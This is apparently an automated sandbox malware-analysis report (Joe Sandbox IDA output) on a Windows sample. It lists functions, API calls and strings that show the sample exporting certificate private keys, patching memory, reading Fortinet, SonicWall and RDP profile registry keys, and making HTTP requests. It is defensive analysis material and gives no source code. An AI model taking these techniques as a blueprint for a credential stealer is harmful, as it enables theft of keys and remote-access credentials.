                                                                                                                            control_flow_graph 129 7ff7cbca9224-7ff7cbca9306 GetSystemTimeAsFileTime call 7ff7cbca9a20 * 3 call 7ff7cbca9a98 call 7ff7cbca2698 call 7ff7cbca25dc call 7ff7cbca7b34 * 4 call 7ff7cbca971c call 7ff7cbca25b4 154 7ff7cbca9309-7ff7cbca9317 129->154 155 7ff7cbca9329-7ff7cbca9330 154->155 156 7ff7cbca9319-7ff7cbca931c call 7ff7cbca968c 154->156 158 7ff7cbca9332-7ff7cbca9335 155->158 159 7ff7cbca938c-7ff7cbca9393 155->159 162 7ff7cbca9321-7ff7cbca9323 156->162 158->159 163 7ff7cbca9337-7ff7cbca9351 158->163 160 7ff7cbca93a2-7ff7cbca93b6 WaitForSingleObject 159->160 161 7ff7cbca9395-7ff7cbca9399 call 7ff7cbca968c 159->161 165 7ff7cbca93f5 160->165 166 7ff7cbca93b8-7ff7cbca93ca GetSystemTimeAsFileTime 160->166 169 7ff7cbca939e-7ff7cbca93a0 161->169 162->155 162->165 167 7ff7cbca9382-7ff7cbca9386 163->167 168 7ff7cbca9353-7ff7cbca9365 call 7ff7cbca7b50 163->168 171 7ff7cbca93f7-7ff7cbca9417 165->171 166->154 170 7ff7cbca93d0-7ff7cbca93e3 call 7ff7cbca9a98 166->170 167->159 173 7ff7cbca9418-7ff7cbca942c WaitForSingleObject 167->173 178 7ff7cbca9374-7ff7cbca9380 168->178 179 7ff7cbca9367-7ff7cbca936e 168->179 169->160 169->165 170->154 184 7ff7cbca93e9-7ff7cbca93ef TerminateProcess 170->184 173->165 176 7ff7cbca942e-7ff7cbca9434 173->176 180 7ff7cbca9442-7ff7cbca9449 176->180 181 7ff7cbca9436-7ff7cbca9439 call 7ff7cbca968c 176->181 178->167 178->168 179->173 179->178 182 7ff7cbca9458-7ff7cbca9468 GetExitCodeProcess 180->182 183 7ff7cbca944b-7ff7cbca944f call 7ff7cbca968c 180->183 189 7ff7cbca943e-7ff7cbca9440 181->189 187 7ff7cbca9473-7ff7cbca9475 182->187 188 7ff7cbca946a-7ff7cbca9471 182->188 190 7ff7cbca9454-7ff7cbca9456 183->190 184->165 187->171 188->165 188->187 189->165 189->180 190->165 190->182
                                                                                                                            APIs
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA924D
                                                                                                                              • Part of subcall function 00007FF7CBCA25DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CBCA1985,?,?,?,00007FF7CBCA155F), ref: 00007FF7CBCA25E5
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: GetProcessHeap.KERNEL32 ref: 00007FF7CBCA25C1
                                                                                                                              • Part of subcall function 00007FF7CBCA25B4: RtlFreeHeap.NTDLL ref: 00007FF7CBCA25CF
                                                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA93AB
                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA93C0
                                                                                                                            • TerminateProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA93EF
                                                                                                                              • Part of subcall function 00007FF7CBCA968C: PeekNamedPipe.KERNELBASE ref: 00007FF7CBCA96B8
                                                                                                                            • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000002,?), ref: 00007FF7CBCA9421
                                                                                                                            • GetExitCodeProcess.KERNELBASE ref: 00007FF7CBCA9460
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ProcessTime$Heap$FileObjectSingleSystemWait$CodeExitFreeNamedPeekPipeTerminate
                                                                                                                            • String ID: & echo
                                                                                                                            • API String ID: 2711250446-3491486023
                                                                                                                            • Opcode ID: 9501a8b6e56cac107a441458360dc59c43fe8e9a05d9c4e06a1eb98c650668d3
                                                                                                                            • Instruction ID: 3bec1a7aa0a13fcccb6b20944d3da7c00b11a4a17fb4a74cf147a75b846bf357
                                                                                                                            • Opcode Fuzzy Hash: 9501a8b6e56cac107a441458360dc59c43fe8e9a05d9c4e06a1eb98c650668d3
                                                                                                                            • Instruction Fuzzy Hash: 47515425B1965281EE30FF1AE5552BAE361FF84BA0F844831EF4E47AA5DE7CE445C320
                                                                                                                            Function 00007FF7CBCA2BAC Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 65encryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Cert$NameStore$CertificatesCloseEnumOpenString
                                                                                                                            • String ID: +ss$+sls$fs{s${s{s
                                                                                                                            • API String ID: 3617724111-3691527440
                                                                                                                            • Opcode ID: 041190dec486dc00a696f8e4274d1a1c3cacc9eb9b54fbdfd046d7e1b3a2024b
                                                                                                                            • Instruction ID: edcb67239b6b68b93a48776e4fc6155eacee125f3c9669d6325235f45932fcaa
                                                                                                                            • Opcode Fuzzy Hash: 041190dec486dc00a696f8e4274d1a1c3cacc9eb9b54fbdfd046d7e1b3a2024b
                                                                                                                            • Instruction Fuzzy Hash: BA21B522A5869281E760AF5AE4403AEF361FB84B90F849431FF9E4B769DF3CD004C750
                                                                                                                            Function 00007FF7CBCA2B1C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 34encryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CertEnumStoreSystem
                                                                                                                            • String ID: ":{$"_":""
                                                                                                                            • API String ID: 4132996702-2026347918
                                                                                                                            • Opcode ID: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                                                                            • Instruction ID: 94178f5d39d64df76898e11bf25ca889dfb1a757bf02ab4f7455f2db09d8cdd6
                                                                                                                            • Opcode Fuzzy Hash: 02997e885b2f021e2d77aaf3545baf76aa65b304f2a4f6736cd43391604a521e
                                                                                                                            • Instruction Fuzzy Hash: 0E01A225E5866142FB14FFAEA4401B9A355AF89BE0FC89431FE2E0777A8F2CD146C350
                                                                                                                            Function 00007FF7CBCA31C4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22encryptionCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CertEnumLocationStoreSystem
                                                                                                                            • String ID: "_": ""
                                                                                                                            • API String ID: 863500693-1453221996
                                                                                                                            • Opcode ID: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                                                            • Instruction ID: 6f68a68d590d496228e4c2e98e9d616a45e3bcb5855d890ea6ebbb82f6a24f8c
                                                                                                                            • Opcode Fuzzy Hash: ac8b6152a2a2325c9d9276e908165484d39c70b2a51ab9d8d04172e70dc37df3
                                                                                                                            • Instruction Fuzzy Hash: 1CE03055AA856241EE64BFAAA8511F593145F497E0FC82431FE1F4A376DE2CD1898320
                                                                                                                            Function 00007FF7CBCA968C Relevance: 3.0, APIs: 2, Instructions: 42filepipeCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: FileNamedPeekPipeRead
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 327342812-0
                                                                                                                            • Opcode ID: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                                            • Instruction ID: 6f9dc541f5a7bdcd64e5a6f39810add0285742f10a5248228e099899ef55ab1d
                                                                                                                            • Opcode Fuzzy Hash: 34d1d673edd9c40d02f270326efd511933567532b5db1aeb081074a9eac190bf
                                                                                                                            • Instruction Fuzzy Hash: E301C42272865287E720AF19E44177AF3A0EB84BE4FA44534EB488B764DFBCE4408B50
                                                                                                                            Function 00007FF7CBCA95A0 Relevance: 3.0, APIs: 2, Instructions: 39synchronizationCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CodeExitNamedObjectPeekPipeProcessSingleWait
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2021502500-0
                                                                                                                            • Opcode ID: 219911f9fbf93e8dc81b8ab5b15ed7b90f6e7e4d0e94d35a3e310abd07cbe8cc
                                                                                                                            • Instruction ID: 2b5f5c9969b88cc19436da85c1b31952c19d325cb8543dafe00ee978ded5ff3f
                                                                                                                            • Opcode Fuzzy Hash: 219911f9fbf93e8dc81b8ab5b15ed7b90f6e7e4d0e94d35a3e310abd07cbe8cc
                                                                                                                            • Instruction Fuzzy Hash: D2018462A1895281EFA0AF29D4463BC6361EF40F98FA45931EB0D474A9DFACDC85C310
                                                                                                                            Function 00007FF7CBCA25B4 Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 682 7ff7cbca25b4-7ff7cbca25b7 683 7ff7cbca25da 682->683 684 7ff7cbca25b9-7ff7cbca25d9 GetProcessHeap RtlFreeHeap 682->684 684->683
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Heap$FreeProcess
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3859560861-0
                                                                                                                            • Opcode ID: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
                                                                                                                            • Instruction ID: fc874a61e244393b01645d1476f95db25b3702cef564741ec7e6f4276a848406
                                                                                                                            • Opcode Fuzzy Hash: 3522ce1484baedbfe33511e301451e993b837232db68b9421e2362fa418d2ba1
                                                                                                                            • Instruction Fuzzy Hash: 18C01244E5661242FE3CABEB241407592516F5DB91B484030DF0A19771DE2C51D54210
                                                                                                                            Function 00007FF7CBCA1A70 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 685 7ff7cbca1a70-7ff7cbca1ab8 call 7ff7cbca1918 wvsprintfW
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: wvsprintf
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2795597889-0
                                                                                                                            • Opcode ID: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                                                            • Instruction ID: 62fb65bf6af4d806353a9024b6c9111032e4b2da68c8e8dc56edc331fe3f7bed
                                                                                                                            • Opcode Fuzzy Hash: 1ee19605ac26c83bc426fe2672bc05ad22fbb01a022c874d8b8b7949f4abed9f
                                                                                                                            • Instruction Fuzzy Hash: D2E06DB3A40B55C2D7049F29E98008CBB75EB99FD4B948021DF4817324CF38D996C760
                                                                                                                            Function 00007FF7CBCA79C4 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 688 7ff7cbca79c4-7ff7cbca79d9 GetNativeSystemInfo 689 7ff7cbca79e7 688->689 690 7ff7cbca79db-7ff7cbca79e1 688->690 692 7ff7cbca79e9-7ff7cbca79ed 689->692 690->689 691 7ff7cbca79e3-7ff7cbca79e5 690->691 691->692
                                                                                                                            APIs
                                                                                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00007FF7CBCA74DE), ref: 00007FF7CBCA79CD
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: InfoNativeSystem
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1721193555-0
                                                                                                                            • Opcode ID: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                            • Instruction ID: 50a5fae239760d2581258f4ba071379c06f9afc1560f28932c7ccbbe23585411
                                                                                                                            • Opcode Fuzzy Hash: 6118cf754c1c705de9ec470bc179da628b291e502bfd3552ff041d694441724e
                                                                                                                            • Instruction Fuzzy Hash: 41D0A702C0C692C2DF317F18D44B03AA371BB64319FC00633E39D024B06F6CD699DA25

                                                                                                                            Non-executed Functions

                                                                                                                            Function 00007FF7CBCADC0C Relevance: 54.7, APIs: 16, Strings: 15, Instructions: 436filestringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: File$Path$ExistsHeap$AppendCreateEnvironmentProcessReadSizeVariable$CombineFreeQuoteSpaceslstrcatlstrlen
                                                                                                                            • String ID: ", "group": "$", "host": "$"user": "$</DefaultGroup>$</DefaultHostName>$</DefaultUser>$<DefaultGroup>$<DefaultHostName>$<DefaultUser>$Software\Fortinet\FortiClient\Sslvpn\Tunnels$Software\Microsoft\Terminal Server Client\Servers$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles$Software\SonicWall\SSL-VPN NetExtender\Standalone$]},$}},
                                                                                                                            • API String ID: 2508640211-1951492331
                                                                                                                            • Opcode ID: 6257946d6f67a48a3e0c4b58714dd796895bfd9337bf57f202e8c5bb3e622608
                                                                                                                            • Instruction ID: 7dc8321166a1ef433470333fe493dfe1a947a9d0779bdec27e600ad50d5e3911
                                                                                                                            • Opcode Fuzzy Hash: 6257946d6f67a48a3e0c4b58714dd796895bfd9337bf57f202e8c5bb3e622608
                                                                                                                            • Instruction Fuzzy Hash: AA128E61A1866245EB20FF69D8513FDA361AF85BA4FC04531FB1D4BABADF2CD505C320
                                                                                                                            Function 00007FF7CBCA3220 Relevance: 52.8, APIs: 25, Strings: 5, Instructions: 313encryptionmemorylibraryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • CertGetCertificateContextProperty.CRYPT32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA325E
                                                                                                                            • CryptAcquireCertificatePrivateKey.CRYPT32 ref: 00007FF7CBCA328D
                                                                                                                            • CryptGetUserKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA32BB
                                                                                                                              • Part of subcall function 00007FF7CBCA36F0: CryptExportKey.ADVAPI32 ref: 00007FF7CBCA3744
                                                                                                                              • Part of subcall function 00007FF7CBCA36F0: CryptExportKey.ADVAPI32 ref: 00007FF7CBCA379E
                                                                                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3336
                                                                                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3380
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA33AC
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA33DC
                                                                                                                            • CryptExportKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA3404
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA341C
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA343F
                                                                                                                            • CryptAcquireContextA.ADVAPI32 ref: 00007FF7CBCA3459
                                                                                                                            • CryptImportKey.ADVAPI32 ref: 00007FF7CBCA347E
                                                                                                                            • OpenSCManagerA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA34B5
                                                                                                                            • OpenServiceA.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3505
                                                                                                                            • QueryServiceStatusEx.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3523
                                                                                                                            • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA3532
                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA355D
                                                                                                                            • ReadProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7CBCA2C48), ref: 00007FF7CBCA357C
                                                                                                                            • WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7CBCA359F
                                                                                                                            • NCryptExportKey.NCRYPT ref: 00007FF7CBCA3605
                                                                                                                            • CertOpenStore.CRYPT32 ref: 00007FF7CBCA3667
                                                                                                                            • CertAddCertificateLinkToStore.CRYPT32 ref: 00007FF7CBCA3682
                                                                                                                            • CertSetCertificateContextProperty.CRYPT32 ref: 00007FF7CBCA369E
                                                                                                                            • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CBCA36BD
                                                                                                                            • PFXExportCertStoreEx.CRYPT32 ref: 00007FF7CBCA36DF
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Crypt$CertExport$CertificateOpenProcessProtectStoreVirtual$ContextMemory$AcquirePropertyReadService$AddressImportLibraryLinkLoadManagerPrivateProcQueryStatusUserWrite
                                                                                                                            • String ID: -,0z$5)F$CAPIPRIVATEBLOB$Microsoft Software Key Storage Provider$km{l
                                                                                                                            • API String ID: 2161712720-385819238
                                                                                                                            • Opcode ID: 75218921cc3421a315647877bddf5402e5b1d27b10d9dd8a73d73ab1dfe14f5f
                                                                                                                            • Instruction ID: ae87c4ee3059440fb8e593ef0657d4f88a3ca83d6d04778858a20a1a3804fedc
                                                                                                                            • Opcode Fuzzy Hash: 75218921cc3421a315647877bddf5402e5b1d27b10d9dd8a73d73ab1dfe14f5f
                                                                                                                            • Instruction Fuzzy Hash: 96E18D32B18A518AEB20DFA5E4546EEB7A1BB48798F804136EF4D17A68DF3CD109C750
                                                                                                                            Function 00007FF7CBCA213C Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 241COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000B.00000002.4582327275.00007FF7CBCA1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CBCA0000, based on PE: true
                                                                                                                            • Associated: 0000000B.00000002.4582203663.00007FF7CBCA0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582365915.00007FF7CBCB1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582402290.00007FF7CBCB4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            • Associated: 0000000B.00000002.4582453683.00007FF7CBCB5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_11_2_7ff7cbca0000_8CAE.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Http$CloseHandle$DataHeapOpenOptionQueryRequest$AvailableConnectCrackFreeProcessReadReceiveResponseSend
                                                                                                                            • String ID: <r;r$?r r$?r r
                                                                                                                            • API String ID: 199669925-2032818692
                                                                                                                            • Opcode ID: 7c3200e5b1162a59e3336203ad07deaebe161b4bdf8a21f308cab0b868f4c084
                                                                                                                            • Instruction ID: 2725614a151d2c9a4945bd1756cab02e9933a7a72f36c61e3883cd1193c7a3c6
                                                                                                                            • Opcode Fuzzy Hash: 7c3200e5b1162a59e3336203ad07deaebe161b4bdf8a21f308cab0b868f4c084
